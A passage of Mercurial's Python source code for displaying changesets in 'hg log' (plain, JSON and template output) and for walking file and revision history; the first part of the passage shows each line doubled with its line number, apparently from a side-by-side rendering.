1574 # i18n: column positioning for "hg log"
1574 # i18n: column positioning for "hg log"
1575 self.ui.write(_("user: %s\n") % ctx.user(),
1575 self.ui.write(_("user: %s\n") % ctx.user(),
1576 label='log.user')
1576 label='log.user')
1577 # i18n: column positioning for "hg log"
1577 # i18n: column positioning for "hg log"
1578 self.ui.write(_("date: %s\n") % date,
1578 self.ui.write(_("date: %s\n") % date,
1579 label='log.date')
1579 label='log.date')
1580
1580
1581 if ctx.isunstable():
1581 if ctx.isunstable():
1582 # i18n: column positioning for "hg log"
1582 # i18n: column positioning for "hg log"
1583 instabilities = ctx.instabilities()
1583 instabilities = ctx.instabilities()
1584 self.ui.write(_("instability: %s\n") % ', '.join(instabilities),
1584 self.ui.write(_("instability: %s\n") % ', '.join(instabilities),
1585 label='log.trouble')
1585 label='log.trouble')
1586
1586
1587 self._exthook(ctx)
1587 self._exthook(ctx)
1588
1588
1589 if self.ui.debugflag:
1589 if self.ui.debugflag:
1590 files = ctx.p1().status(ctx)[:3]
1590 files = ctx.p1().status(ctx)[:3]
1591 for key, value in zip([# i18n: column positioning for "hg log"
1591 for key, value in zip([# i18n: column positioning for "hg log"
1592 _("files:"),
1592 _("files:"),
1593 # i18n: column positioning for "hg log"
1593 # i18n: column positioning for "hg log"
1594 _("files+:"),
1594 _("files+:"),
1595 # i18n: column positioning for "hg log"
1595 # i18n: column positioning for "hg log"
1596 _("files-:")], files):
1596 _("files-:")], files):
1597 if value:
1597 if value:
1598 self.ui.write("%-12s %s\n" % (key, " ".join(value)),
1598 self.ui.write("%-12s %s\n" % (key, " ".join(value)),
1599 label='ui.debug log.files')
1599 label='ui.debug log.files')
1600 elif ctx.files() and self.ui.verbose:
1600 elif ctx.files() and self.ui.verbose:
1601 # i18n: column positioning for "hg log"
1601 # i18n: column positioning for "hg log"
1602 self.ui.write(_("files: %s\n") % " ".join(ctx.files()),
1602 self.ui.write(_("files: %s\n") % " ".join(ctx.files()),
1603 label='ui.note log.files')
1603 label='ui.note log.files')
1604 if copies and self.ui.verbose:
1604 if copies and self.ui.verbose:
1605 copies = ['%s (%s)' % c for c in copies]
1605 copies = ['%s (%s)' % c for c in copies]
1606 # i18n: column positioning for "hg log"
1606 # i18n: column positioning for "hg log"
1607 self.ui.write(_("copies: %s\n") % ' '.join(copies),
1607 self.ui.write(_("copies: %s\n") % ' '.join(copies),
1608 label='ui.note log.copies')
1608 label='ui.note log.copies')
1609
1609
1610 extra = ctx.extra()
1610 extra = ctx.extra()
1611 if extra and self.ui.debugflag:
1611 if extra and self.ui.debugflag:
1612 for key, value in sorted(extra.items()):
1612 for key, value in sorted(extra.items()):
1613 # i18n: column positioning for "hg log"
1613 # i18n: column positioning for "hg log"
1614 self.ui.write(_("extra: %s=%s\n")
1614 self.ui.write(_("extra: %s=%s\n")
1615 % (key, util.escapestr(value)),
1615 % (key, util.escapestr(value)),
1616 label='ui.debug log.extra')
1616 label='ui.debug log.extra')
1617
1617
1618 description = ctx.description().strip()
1618 description = ctx.description().strip()
1619 if description:
1619 if description:
1620 if self.ui.verbose:
1620 if self.ui.verbose:
1621 self.ui.write(_("description:\n"),
1621 self.ui.write(_("description:\n"),
1622 label='ui.note log.description')
1622 label='ui.note log.description')
1623 self.ui.write(description,
1623 self.ui.write(description,
1624 label='ui.note log.description')
1624 label='ui.note log.description')
1625 self.ui.write("\n\n")
1625 self.ui.write("\n\n")
1626 else:
1626 else:
1627 # i18n: column positioning for "hg log"
1627 # i18n: column positioning for "hg log"
1628 self.ui.write(_("summary: %s\n") %
1628 self.ui.write(_("summary: %s\n") %
1629 description.splitlines()[0],
1629 description.splitlines()[0],
1630 label='log.summary')
1630 label='log.summary')
1631 self.ui.write("\n")
1631 self.ui.write("\n")
1632
1632
1633 self.showpatch(ctx, matchfn)
1633 self.showpatch(ctx, matchfn)
1634
1634
1635 def _exthook(self, ctx):
1635 def _exthook(self, ctx):
1636 '''empty method used by extension as a hook point
1636 '''empty method used by extension as a hook point
1637 '''
1637 '''
1638 pass
1638 pass
1639
1639
1640 def showpatch(self, ctx, matchfn):
1640 def showpatch(self, ctx, matchfn):
1641 if not matchfn:
1641 if not matchfn:
1642 matchfn = self.matchfn
1642 matchfn = self.matchfn
1643 if matchfn:
1643 if matchfn:
1644 stat = self.diffopts.get('stat')
1644 stat = self.diffopts.get('stat')
1645 diff = self.diffopts.get('patch')
1645 diff = self.diffopts.get('patch')
1646 diffopts = patch.diffallopts(self.ui, self.diffopts)
1646 diffopts = patch.diffallopts(self.ui, self.diffopts)
1647 node = ctx.node()
1647 node = ctx.node()
1648 prev = ctx.p1().node()
1648 prev = ctx.p1().node()
1649 if stat:
1649 if stat:
1650 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1650 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1651 match=matchfn, stat=True)
1651 match=matchfn, stat=True)
1652 if diff:
1652 if diff:
1653 if stat:
1653 if stat:
1654 self.ui.write("\n")
1654 self.ui.write("\n")
1655 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1655 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1656 match=matchfn, stat=False)
1656 match=matchfn, stat=False)
1657 self.ui.write("\n")
1657 self.ui.write("\n")
1658
1658
1659 class jsonchangeset(changeset_printer):
1659 class jsonchangeset(changeset_printer):
1660 '''format changeset information.'''
1660 '''format changeset information.'''
1661
1661
1662 def __init__(self, ui, repo, matchfn, diffopts, buffered):
1662 def __init__(self, ui, repo, matchfn, diffopts, buffered):
1663 changeset_printer.__init__(self, ui, repo, matchfn, diffopts, buffered)
1663 changeset_printer.__init__(self, ui, repo, matchfn, diffopts, buffered)
1664 self.cache = {}
1664 self.cache = {}
1665 self._first = True
1665 self._first = True
1666
1666
1667 def close(self):
1667 def close(self):
1668 if not self._first:
1668 if not self._first:
1669 self.ui.write("\n]\n")
1669 self.ui.write("\n]\n")
1670 else:
1670 else:
1671 self.ui.write("[]\n")
1671 self.ui.write("[]\n")
1672
1672
1673 def _show(self, ctx, copies, matchfn, props):
1673 def _show(self, ctx, copies, matchfn, props):
1674 '''show a single changeset or file revision'''
1674 '''show a single changeset or file revision'''
1675 rev = ctx.rev()
1675 rev = ctx.rev()
1676 if rev is None:
1676 if rev is None:
1677 jrev = jnode = 'null'
1677 jrev = jnode = 'null'
1678 else:
1678 else:
1679 jrev = '%d' % rev
1679 jrev = '%d' % rev
1680 jnode = '"%s"' % hex(ctx.node())
1680 jnode = '"%s"' % hex(ctx.node())
1681 j = encoding.jsonescape
1681 j = encoding.jsonescape
1682
1682
1683 if self._first:
1683 if self._first:
1684 self.ui.write("[\n {")
1684 self.ui.write("[\n {")
1685 self._first = False
1685 self._first = False
1686 else:
1686 else:
1687 self.ui.write(",\n {")
1687 self.ui.write(",\n {")
1688
1688
1689 if self.ui.quiet:
1689 if self.ui.quiet:
1690 self.ui.write(('\n "rev": %s') % jrev)
1690 self.ui.write(('\n "rev": %s') % jrev)
1691 self.ui.write((',\n "node": %s') % jnode)
1691 self.ui.write((',\n "node": %s') % jnode)
1692 self.ui.write('\n }')
1692 self.ui.write('\n }')
1693 return
1693 return
1694
1694
1695 self.ui.write(('\n "rev": %s') % jrev)
1695 self.ui.write(('\n "rev": %s') % jrev)
1696 self.ui.write((',\n "node": %s') % jnode)
1696 self.ui.write((',\n "node": %s') % jnode)
1697 self.ui.write((',\n "branch": "%s"') % j(ctx.branch()))
1697 self.ui.write((',\n "branch": "%s"') % j(ctx.branch()))
1698 self.ui.write((',\n "phase": "%s"') % ctx.phasestr())
1698 self.ui.write((',\n "phase": "%s"') % ctx.phasestr())
1699 self.ui.write((',\n "user": "%s"') % j(ctx.user()))
1699 self.ui.write((',\n "user": "%s"') % j(ctx.user()))
1700 self.ui.write((',\n "date": [%d, %d]') % ctx.date())
1700 self.ui.write((',\n "date": [%d, %d]') % ctx.date())
1701 self.ui.write((',\n "desc": "%s"') % j(ctx.description()))
1701 self.ui.write((',\n "desc": "%s"') % j(ctx.description()))
1702
1702
1703 self.ui.write((',\n "bookmarks": [%s]') %
1703 self.ui.write((',\n "bookmarks": [%s]') %
1704 ", ".join('"%s"' % j(b) for b in ctx.bookmarks()))
1704 ", ".join('"%s"' % j(b) for b in ctx.bookmarks()))
1705 self.ui.write((',\n "tags": [%s]') %
1705 self.ui.write((',\n "tags": [%s]') %
1706 ", ".join('"%s"' % j(t) for t in ctx.tags()))
1706 ", ".join('"%s"' % j(t) for t in ctx.tags()))
1707 self.ui.write((',\n "parents": [%s]') %
1707 self.ui.write((',\n "parents": [%s]') %
1708 ", ".join('"%s"' % c.hex() for c in ctx.parents()))
1708 ", ".join('"%s"' % c.hex() for c in ctx.parents()))
1709
1709
1710 if self.ui.debugflag:
1710 if self.ui.debugflag:
1711 if rev is None:
1711 if rev is None:
1712 jmanifestnode = 'null'
1712 jmanifestnode = 'null'
1713 else:
1713 else:
1714 jmanifestnode = '"%s"' % hex(ctx.manifestnode())
1714 jmanifestnode = '"%s"' % hex(ctx.manifestnode())
1715 self.ui.write((',\n "manifest": %s') % jmanifestnode)
1715 self.ui.write((',\n "manifest": %s') % jmanifestnode)
1716
1716
1717 self.ui.write((',\n "extra": {%s}') %
1717 self.ui.write((',\n "extra": {%s}') %
1718 ", ".join('"%s": "%s"' % (j(k), j(v))
1718 ", ".join('"%s": "%s"' % (j(k), j(v))
1719 for k, v in ctx.extra().items()))
1719 for k, v in ctx.extra().items()))
1720
1720
1721 files = ctx.p1().status(ctx)
1721 files = ctx.p1().status(ctx)
1722 self.ui.write((',\n "modified": [%s]') %
1722 self.ui.write((',\n "modified": [%s]') %
1723 ", ".join('"%s"' % j(f) for f in files[0]))
1723 ", ".join('"%s"' % j(f) for f in files[0]))
1724 self.ui.write((',\n "added": [%s]') %
1724 self.ui.write((',\n "added": [%s]') %
1725 ", ".join('"%s"' % j(f) for f in files[1]))
1725 ", ".join('"%s"' % j(f) for f in files[1]))
1726 self.ui.write((',\n "removed": [%s]') %
1726 self.ui.write((',\n "removed": [%s]') %
1727 ", ".join('"%s"' % j(f) for f in files[2]))
1727 ", ".join('"%s"' % j(f) for f in files[2]))
1728
1728
1729 elif self.ui.verbose:
1729 elif self.ui.verbose:
1730 self.ui.write((',\n "files": [%s]') %
1730 self.ui.write((',\n "files": [%s]') %
1731 ", ".join('"%s"' % j(f) for f in ctx.files()))
1731 ", ".join('"%s"' % j(f) for f in ctx.files()))
1732
1732
1733 if copies:
1733 if copies:
1734 self.ui.write((',\n "copies": {%s}') %
1734 self.ui.write((',\n "copies": {%s}') %
1735 ", ".join('"%s": "%s"' % (j(k), j(v))
1735 ", ".join('"%s": "%s"' % (j(k), j(v))
1736 for k, v in copies))
1736 for k, v in copies))
1737
1737
1738 matchfn = self.matchfn
1738 matchfn = self.matchfn
1739 if matchfn:
1739 if matchfn:
1740 stat = self.diffopts.get('stat')
1740 stat = self.diffopts.get('stat')
1741 diff = self.diffopts.get('patch')
1741 diff = self.diffopts.get('patch')
1742 diffopts = patch.difffeatureopts(self.ui, self.diffopts, git=True)
1742 diffopts = patch.difffeatureopts(self.ui, self.diffopts, git=True)
1743 node, prev = ctx.node(), ctx.p1().node()
1743 node, prev = ctx.node(), ctx.p1().node()
1744 if stat:
1744 if stat:
1745 self.ui.pushbuffer()
1745 self.ui.pushbuffer()
1746 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1746 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1747 match=matchfn, stat=True)
1747 match=matchfn, stat=True)
1748 self.ui.write((',\n "diffstat": "%s"')
1748 self.ui.write((',\n "diffstat": "%s"')
1749 % j(self.ui.popbuffer()))
1749 % j(self.ui.popbuffer()))
1750 if diff:
1750 if diff:
1751 self.ui.pushbuffer()
1751 self.ui.pushbuffer()
1752 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1752 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1753 match=matchfn, stat=False)
1753 match=matchfn, stat=False)
1754 self.ui.write((',\n "diff": "%s"') % j(self.ui.popbuffer()))
1754 self.ui.write((',\n "diff": "%s"') % j(self.ui.popbuffer()))
1755
1755
1756 self.ui.write("\n }")
1756 self.ui.write("\n }")
1757
1757
1758 class changeset_templater(changeset_printer):
1758 class changeset_templater(changeset_printer):
1759 '''format changeset information.'''
1759 '''format changeset information.'''
1760
1760
1761 # Arguments before "buffered" used to be positional. Consider not
1761 # Arguments before "buffered" used to be positional. Consider not
1762 # adding/removing arguments before "buffered" to not break callers.
1762 # adding/removing arguments before "buffered" to not break callers.
1763 def __init__(self, ui, repo, tmplspec, matchfn=None, diffopts=None,
1763 def __init__(self, ui, repo, tmplspec, matchfn=None, diffopts=None,
1764 buffered=False):
1764 buffered=False):
1765 diffopts = diffopts or {}
1765 diffopts = diffopts or {}
1766
1766
1767 changeset_printer.__init__(self, ui, repo, matchfn, diffopts, buffered)
1767 changeset_printer.__init__(self, ui, repo, matchfn, diffopts, buffered)
1768 self.t = formatter.loadtemplater(ui, tmplspec,
1768 self.t = formatter.loadtemplater(ui, tmplspec,
1769 cache=templatekw.defaulttempl)
1769 cache=templatekw.defaulttempl)
1770 self._counter = itertools.count()
1770 self._counter = itertools.count()
1771 self.cache = {}
1771 self.cache = {}
1772
1772
1773 self._tref = tmplspec.ref
1773 self._tref = tmplspec.ref
1774 self._parts = {'header': '', 'footer': '',
1774 self._parts = {'header': '', 'footer': '',
1775 tmplspec.ref: tmplspec.ref,
1775 tmplspec.ref: tmplspec.ref,
1776 'docheader': '', 'docfooter': '',
1776 'docheader': '', 'docfooter': '',
1777 'separator': ''}
1777 'separator': ''}
1778 if tmplspec.mapfile:
1778 if tmplspec.mapfile:
1779 # find correct templates for current mode, for backward
1779 # find correct templates for current mode, for backward
1780 # compatibility with 'log -v/-q/--debug' using a mapfile
1780 # compatibility with 'log -v/-q/--debug' using a mapfile
1781 tmplmodes = [
1781 tmplmodes = [
1782 (True, ''),
1782 (True, ''),
1783 (self.ui.verbose, '_verbose'),
1783 (self.ui.verbose, '_verbose'),
1784 (self.ui.quiet, '_quiet'),
1784 (self.ui.quiet, '_quiet'),
1785 (self.ui.debugflag, '_debug'),
1785 (self.ui.debugflag, '_debug'),
1786 ]
1786 ]
1787 for mode, postfix in tmplmodes:
1787 for mode, postfix in tmplmodes:
1788 for t in self._parts:
1788 for t in self._parts:
1789 cur = t + postfix
1789 cur = t + postfix
1790 if mode and cur in self.t:
1790 if mode and cur in self.t:
1791 self._parts[t] = cur
1791 self._parts[t] = cur
1792 else:
1792 else:
1793 partnames = [p for p in self._parts.keys() if p != tmplspec.ref]
1793 partnames = [p for p in self._parts.keys() if p != tmplspec.ref]
1794 m = formatter.templatepartsmap(tmplspec, self.t, partnames)
1794 m = formatter.templatepartsmap(tmplspec, self.t, partnames)
1795 self._parts.update(m)
1795 self._parts.update(m)
1796
1796
1797 if self._parts['docheader']:
1797 if self._parts['docheader']:
1798 self.ui.write(templater.stringify(self.t(self._parts['docheader'])))
1798 self.ui.write(templater.stringify(self.t(self._parts['docheader'])))
1799
1799
1800 def close(self):
1800 def close(self):
1801 if self._parts['docfooter']:
1801 if self._parts['docfooter']:
1802 if not self.footer:
1802 if not self.footer:
1803 self.footer = ""
1803 self.footer = ""
1804 self.footer += templater.stringify(self.t(self._parts['docfooter']))
1804 self.footer += templater.stringify(self.t(self._parts['docfooter']))
1805 return super(changeset_templater, self).close()
1805 return super(changeset_templater, self).close()
1806
1806
1807 def _show(self, ctx, copies, matchfn, props):
1807 def _show(self, ctx, copies, matchfn, props):
1808 '''show a single changeset or file revision'''
1808 '''show a single changeset or file revision'''
1809 props = props.copy()
1809 props = props.copy()
1810 props.update(templatekw.keywords)
1810 props.update(templatekw.keywords)
1811 props['templ'] = self.t
1811 props['templ'] = self.t
1812 props['ctx'] = ctx
1812 props['ctx'] = ctx
1813 props['repo'] = self.repo
1813 props['repo'] = self.repo
1814 props['ui'] = self.repo.ui
1814 props['ui'] = self.repo.ui
1815 props['index'] = index = next(self._counter)
1815 props['index'] = index = next(self._counter)
1816 props['revcache'] = {'copies': copies}
1816 props['revcache'] = {'copies': copies}
1817 props['cache'] = self.cache
1817 props['cache'] = self.cache
1818 props = pycompat.strkwargs(props)
1818 props = pycompat.strkwargs(props)
1819
1819
1820 # write separator, which wouldn't work well with the header part below
1820 # write separator, which wouldn't work well with the header part below
1821 # since there's inherently a conflict between header (across items) and
1821 # since there's inherently a conflict between header (across items) and
1822 # separator (per item)
1822 # separator (per item)
1823 if self._parts['separator'] and index > 0:
1823 if self._parts['separator'] and index > 0:
1824 self.ui.write(templater.stringify(self.t(self._parts['separator'])))
1824 self.ui.write(templater.stringify(self.t(self._parts['separator'])))
1825
1825
1826 # write header
1826 # write header
1827 if self._parts['header']:
1827 if self._parts['header']:
1828 h = templater.stringify(self.t(self._parts['header'], **props))
1828 h = templater.stringify(self.t(self._parts['header'], **props))
1829 if self.buffered:
1829 if self.buffered:
1830 self.header[ctx.rev()] = h
1830 self.header[ctx.rev()] = h
1831 else:
1831 else:
1832 if self.lastheader != h:
1832 if self.lastheader != h:
1833 self.lastheader = h
1833 self.lastheader = h
1834 self.ui.write(h)
1834 self.ui.write(h)
1835
1835
1836 # write changeset metadata, then patch if requested
1836 # write changeset metadata, then patch if requested
1837 key = self._parts[self._tref]
1837 key = self._parts[self._tref]
1838 self.ui.write(templater.stringify(self.t(key, **props)))
1838 self.ui.write(templater.stringify(self.t(key, **props)))
1839 self.showpatch(ctx, matchfn)
1839 self.showpatch(ctx, matchfn)
1840
1840
1841 if self._parts['footer']:
1841 if self._parts['footer']:
1842 if not self.footer:
1842 if not self.footer:
1843 self.footer = templater.stringify(
1843 self.footer = templater.stringify(
1844 self.t(self._parts['footer'], **props))
1844 self.t(self._parts['footer'], **props))
1845
1845
1846 def logtemplatespec(tmpl, mapfile):
1846 def logtemplatespec(tmpl, mapfile):
1847 if mapfile:
1847 if mapfile:
1848 return formatter.templatespec('changeset', tmpl, mapfile)
1848 return formatter.templatespec('changeset', tmpl, mapfile)
1849 else:
1849 else:
1850 return formatter.templatespec('', tmpl, None)
1850 return formatter.templatespec('', tmpl, None)
1851
1851
1852 def _lookuplogtemplate(ui, tmpl, style):
1852 def _lookuplogtemplate(ui, tmpl, style):
1853 """Find the template matching the given template spec or style
1853 """Find the template matching the given template spec or style
1854
1854
1855 See formatter.lookuptemplate() for details.
1855 See formatter.lookuptemplate() for details.
1856 """
1856 """
1857
1857
1858 # ui settings
1858 # ui settings
1859 if not tmpl and not style: # template are stronger than style
1859 if not tmpl and not style: # template are stronger than style
1860 tmpl = ui.config('ui', 'logtemplate')
1860 tmpl = ui.config('ui', 'logtemplate')
1861 if tmpl:
1861 if tmpl:
1862 return logtemplatespec(templater.unquotestring(tmpl), None)
1862 return logtemplatespec(templater.unquotestring(tmpl), None)
1863 else:
1863 else:
1864 style = util.expandpath(ui.config('ui', 'style'))
1864 style = util.expandpath(ui.config('ui', 'style'))
1865
1865
1866 if not tmpl and style:
1866 if not tmpl and style:
1867 mapfile = style
1867 mapfile = style
1868 if not os.path.split(mapfile)[0]:
1868 if not os.path.split(mapfile)[0]:
1869 mapname = (templater.templatepath('map-cmdline.' + mapfile)
1869 mapname = (templater.templatepath('map-cmdline.' + mapfile)
1870 or templater.templatepath(mapfile))
1870 or templater.templatepath(mapfile))
1871 if mapname:
1871 if mapname:
1872 mapfile = mapname
1872 mapfile = mapname
1873 return logtemplatespec(None, mapfile)
1873 return logtemplatespec(None, mapfile)
1874
1874
1875 if not tmpl:
1875 if not tmpl:
1876 return logtemplatespec(None, None)
1876 return logtemplatespec(None, None)
1877
1877
1878 return formatter.lookuptemplate(ui, 'changeset', tmpl)
1878 return formatter.lookuptemplate(ui, 'changeset', tmpl)
1879
1879
1880 def makelogtemplater(ui, repo, tmpl, buffered=False):
1880 def makelogtemplater(ui, repo, tmpl, buffered=False):
1881 """Create a changeset_templater from a literal template 'tmpl'"""
1881 """Create a changeset_templater from a literal template 'tmpl'"""
1882 spec = logtemplatespec(tmpl, None)
1882 spec = logtemplatespec(tmpl, None)
1883 return changeset_templater(ui, repo, spec, buffered=buffered)
1883 return changeset_templater(ui, repo, spec, buffered=buffered)
1884
1884
1885 def show_changeset(ui, repo, opts, buffered=False):
1885 def show_changeset(ui, repo, opts, buffered=False):
1886 """show one changeset using template or regular display.
1886 """show one changeset using template or regular display.
1887
1887
1888 Display format will be the first non-empty hit of:
1888 Display format will be the first non-empty hit of:
1889 1. option 'template'
1889 1. option 'template'
1890 2. option 'style'
1890 2. option 'style'
1891 3. [ui] setting 'logtemplate'
1891 3. [ui] setting 'logtemplate'
1892 4. [ui] setting 'style'
1892 4. [ui] setting 'style'
1893 If all of these values are either the unset or the empty string,
1893 If all of these values are either the unset or the empty string,
1894 regular display via changeset_printer() is done.
1894 regular display via changeset_printer() is done.
1895 """
1895 """
1896 # options
1896 # options
1897 matchfn = None
1897 matchfn = None
1898 if opts.get('patch') or opts.get('stat'):
1898 if opts.get('patch') or opts.get('stat'):
1899 matchfn = scmutil.matchall(repo)
1899 matchfn = scmutil.matchall(repo)
1900
1900
1901 if opts.get('template') == 'json':
1901 if opts.get('template') == 'json':
1902 return jsonchangeset(ui, repo, matchfn, opts, buffered)
1902 return jsonchangeset(ui, repo, matchfn, opts, buffered)
1903
1903
1904 spec = _lookuplogtemplate(ui, opts.get('template'), opts.get('style'))
1904 spec = _lookuplogtemplate(ui, opts.get('template'), opts.get('style'))
1905
1905
1906 if not spec.ref and not spec.tmpl and not spec.mapfile:
1906 if not spec.ref and not spec.tmpl and not spec.mapfile:
1907 return changeset_printer(ui, repo, matchfn, opts, buffered)
1907 return changeset_printer(ui, repo, matchfn, opts, buffered)
1908
1908
1909 return changeset_templater(ui, repo, spec, matchfn, opts, buffered)
1909 return changeset_templater(ui, repo, spec, matchfn, opts, buffered)
1910
1910
1911 def showmarker(fm, marker, index=None):
1911 def showmarker(fm, marker, index=None):
1912 """utility function to display obsolescence marker in a readable way
1912 """utility function to display obsolescence marker in a readable way
1913
1913
1914 To be used by debug function."""
1914 To be used by debug function."""
1915 if index is not None:
1915 if index is not None:
1916 fm.write('index', '%i ', index)
1916 fm.write('index', '%i ', index)
1917 fm.write('precnode', '%s ', hex(marker.prednode()))
1917 fm.write('precnode', '%s ', hex(marker.prednode()))
1918 succs = marker.succnodes()
1918 succs = marker.succnodes()
1919 fm.condwrite(succs, 'succnodes', '%s ',
1919 fm.condwrite(succs, 'succnodes', '%s ',
1920 fm.formatlist(map(hex, succs), name='node'))
1920 fm.formatlist(map(hex, succs), name='node'))
1921 fm.write('flag', '%X ', marker.flags())
1921 fm.write('flag', '%X ', marker.flags())
1922 parents = marker.parentnodes()
1922 parents = marker.parentnodes()
1923 if parents is not None:
1923 if parents is not None:
1924 fm.write('parentnodes', '{%s} ',
1924 fm.write('parentnodes', '{%s} ',
1925 fm.formatlist(map(hex, parents), name='node', sep=', '))
1925 fm.formatlist(map(hex, parents), name='node', sep=', '))
1926 fm.write('date', '(%s) ', fm.formatdate(marker.date()))
1926 fm.write('date', '(%s) ', fm.formatdate(marker.date()))
1927 meta = marker.metadata().copy()
1927 meta = marker.metadata().copy()
1928 meta.pop('date', None)
1928 meta.pop('date', None)
1929 fm.write('metadata', '{%s}', fm.formatdict(meta, fmt='%r: %r', sep=', '))
1929 fm.write('metadata', '{%s}', fm.formatdict(meta, fmt='%r: %r', sep=', '))
1930 fm.plain('\n')
1930 fm.plain('\n')
1931
1931
def finddate(ui, repo, date):
    """Find the tipmost changeset that matches the given date spec

    Returns the matching revision number as a string, or raises
    error.Abort when no revision matches.
    """

    df = util.matchdate(date)
    m = scmutil.matchall(repo)
    results = {}

    def prep(ctx, fns):
        # record every revision whose commit timestamp matches the spec;
        # d is a (unixtime, tzoffset) pair, only the timestamp is tested
        d = ctx.date()
        if df(d[0]):
            results[ctx.rev()] = d

    # walkchangerevs yields newest-first here, so the first hit is the
    # tipmost matching changeset
    for ctx in walkchangerevs(repo, m, {'rev': None}, prep):
        rev = ctx.rev()
        if rev in results:
            ui.status(_("found revision %s from %s\n") %
                      (rev, util.datestr(results[rev])))
            return '%d' % rev

    raise error.Abort(_("revision matching date not found"))
1952
1952
def increasingwindows(windowsize=8, sizelimit=512):
    """Yield an endless stream of window sizes.

    The size starts at ``windowsize`` and doubles after each yield until
    it is no longer below ``sizelimit``, after which the last value is
    repeated forever.
    """
    size = windowsize
    while True:
        yield size
        if size < sizelimit:
            size = size * 2
1958
1958
class FileWalkError(Exception):
    """Raised when a file's history cannot be walked via filelogs alone.

    Callers catch this to fall back to the slow changelog-scanning path.
    """
1961
1961
def walkfilerevs(repo, match, follow, revs, fncache):
    '''Walks the file history for the matched files.

    Returns the changeset revs that are involved in the file history.

    Throws FileWalkError if the file history can't be walked using
    filelogs alone.

    Side effect: fncache is populated, mapping each wanted rev to the
    list of matched filenames touched at that rev.
    '''
    wanted = set()
    copies = []
    minrev, maxrev = min(revs), max(revs)
    def filerevgen(filelog, last):
        """
        Only files, no patterns. Check the history of each file.

        Examines filelog entries within minrev, maxrev linkrev range
        Returns an iterator yielding (linkrev, parentlinkrevs, copied)
        tuples in backwards order
        """
        cl_count = len(repo)
        revs = []
        for j in xrange(0, last + 1):
            linkrev = filelog.linkrev(j)
            if linkrev < minrev:
                continue
            # only yield rev for which we have the changelog, it can
            # happen while doing "hg log" during a pull or commit
            if linkrev >= cl_count:
                break

            # parent linkrevs, with null parents filtered out
            parentlinkrevs = []
            for p in filelog.parentrevs(j):
                if p != nullrev:
                    parentlinkrevs.append(filelog.linkrev(p))
            n = filelog.node(j)
            # third element carries rename info only when following
            revs.append((linkrev, parentlinkrevs,
                         follow and filelog.renamed(n)))

        return reversed(revs)
    def iterfiles():
        # yields (filename, filenode-or-None) pairs; copies discovered
        # during the walk below are appended to 'copies' and re-yielded
        pctx = repo['.']
        for filename in match.files():
            if follow:
                if filename not in pctx:
                    raise error.Abort(_('cannot follow file not in parent '
                                        'revision: "%s"') % filename)
                yield filename, pctx[filename].filenode()
            else:
                yield filename, None
        for filename_node in copies:
            yield filename_node

    for file_, node in iterfiles():
        filelog = repo.file(file_)
        if not len(filelog):
            if node is None:
                # A zero count may be a directory or deleted file, so
                # try to find matching entries on the slow path.
                if follow:
                    raise error.Abort(
                        _('cannot follow nonexistent file: "%s"') % file_)
                raise FileWalkError("Cannot walk via filelog")
            else:
                continue

        if node is None:
            last = len(filelog) - 1
        else:
            last = filelog.rev(node)

        # keep track of all ancestors of the file
        ancestors = {filelog.linkrev(last)}

        # iterate from latest to oldest revision
        for rev, flparentlinkrevs, copied in filerevgen(filelog, last):
            if not follow:
                if rev > maxrev:
                    continue
            else:
                # Note that last might not be the first interesting
                # rev to us:
                # if the file has been changed after maxrev, we'll
                # have linkrev(last) > maxrev, and we still need
                # to explore the file graph
                if rev not in ancestors:
                    continue
                # XXX insert 1327 fix here
                if flparentlinkrevs:
                    ancestors.update(flparentlinkrevs)

            fncache.setdefault(rev, []).append(file_)
            wanted.add(rev)
            if copied:
                copies.append(copied)

    return wanted
2058
2058
class _followfilter(object):
    """Stateful filter selecting revisions connected to a start point.

    The first rev passed to match() becomes the start revision; later
    revs match when they are descendants (rev > startrev) or ancestors
    (rev <= startrev) of it, tracked through an incrementally-updated
    'roots' set.  match() must be called in a consistent order since it
    mutates state.
    """
    def __init__(self, repo, onlyfirst=False):
        self.repo = repo
        self.startrev = nullrev
        self.roots = set()
        # onlyfirst: consider only first parents (--follow-first)
        self.onlyfirst = onlyfirst

    def match(self, rev):
        def realparents(rev):
            if self.onlyfirst:
                return self.repo.changelog.parentrevs(rev)[0:1]
            else:
                # drop null parents; NB: py2 filter() returns a list
                return filter(lambda x: x != nullrev,
                              self.repo.changelog.parentrevs(rev))

        # first call: adopt rev as the anchor and accept it
        if self.startrev == nullrev:
            self.startrev = rev
            return True

        if rev > self.startrev:
            # forward: all descendants
            if not self.roots:
                self.roots.add(self.startrev)
            for parent in realparents(rev):
                if parent in self.roots:
                    # rev descends from a known root; it becomes a root too
                    self.roots.add(rev)
                    return True
        else:
            # backwards: all parents
            if not self.roots:
                self.roots.update(realparents(self.startrev))
            if rev in self.roots:
                # consume rev and expand the frontier to its parents
                self.roots.remove(rev)
                self.roots.update(realparents(rev))
                return True

        return False
2096
2096
def walkchangerevs(repo, match, opts, prepare):
    '''Iterate over files and the revs in which they changed.

    Callers most commonly need to iterate backwards over the history
    in which they are interested. Doing so has awful (quadratic-looking)
    performance, so we use iterators in a "windowed" way.

    We walk a window of revisions in the desired order. Within the
    window, we first walk forwards to gather data, then in the desired
    order (usually backwards) to display it.

    This function returns an iterator yielding contexts. Before
    yielding each context, the iterator will first call the prepare
    function on each context in the window in forward order.'''

    follow = opts.get('follow') or opts.get('follow_first')
    revs = _logrevs(repo, opts)
    if not revs:
        return []
    wanted = set()
    # slow path needed when patterns are involved, or when --removed
    # forces scanning changesets for files no longer present
    slowpath = match.anypats() or ((match.isexact() or match.prefix()) and
                                   opts.get('removed'))
    fncache = {}
    change = repo.changectx

    # First step is to fill wanted, the set of revisions that we want to yield.
    # When it does not induce extra cost, we also fill fncache for revisions in
    # wanted: a cache of filenames that were changed (ctx.files()) and that
    # match the file filtering conditions.

    if match.always():
        # No files, no patterns. Display all revs.
        wanted = revs
    elif not slowpath:
        # We only have to read through the filelog to find wanted revisions

        try:
            wanted = walkfilerevs(repo, match, follow, revs, fncache)
        except FileWalkError:
            slowpath = True

            # We decided to fall back to the slowpath because at least one
            # of the paths was not a file. Check to see if at least one of them
            # existed in history, otherwise simply return
            for path in match.files():
                if path == '.' or path in repo.store:
                    break
            else:
                return []

    if slowpath:
